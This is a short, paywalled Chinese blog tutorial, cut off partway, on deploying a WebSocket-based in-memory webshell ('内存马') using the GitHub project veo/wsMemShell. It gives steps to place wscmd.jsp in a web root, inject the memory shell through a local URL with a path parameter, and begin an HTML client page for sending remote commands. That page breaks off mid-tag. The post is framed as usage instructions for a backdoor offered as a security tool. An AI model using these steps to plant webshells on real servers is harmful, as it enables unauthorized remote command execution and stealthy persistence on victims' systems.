网络安全工具websocket webshell内存马使用

信安成长日记

已于 2022-10-15 16:36:33 修改

阅读量812

点赞数

CC 4.0 BY-SA版权

分类专栏：安全工具文章标签： web安全

于 2022-09-08 10:40:27 首次发布

本文链接：https://blog.youkuaiyun.com/SHELLCODE_8BIT/article/details/126759998

安全工具专栏收录该内容

33 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了WebSocket Webshell，重点讲解了如何下载项目veo/wsMemShell，将wscmd.jsp部署到web根目录，以及如何注入内存马并进行测试。通过修改特定HTML中的IP地址，访问页面并在控制台发送命令，可以实现远程控制。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

下载项目

注入内存马

测试

下载项目

veo/wsMemShell: WebSocket Webshell，一种新型WebShell技术 (github.com)

将其中的wscmd.jsp放置到web根目录

注入内存马

输入下列地址即可成功注入

http://127.0.0.1:8080/wscmd.jsp?path=/socket

测试

将下列html保存

<!doctype html>
<html lang="">
<head>
    <meta charset="utf-8">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="x-ua-compatible" cont

了解本专栏

超级会员免费看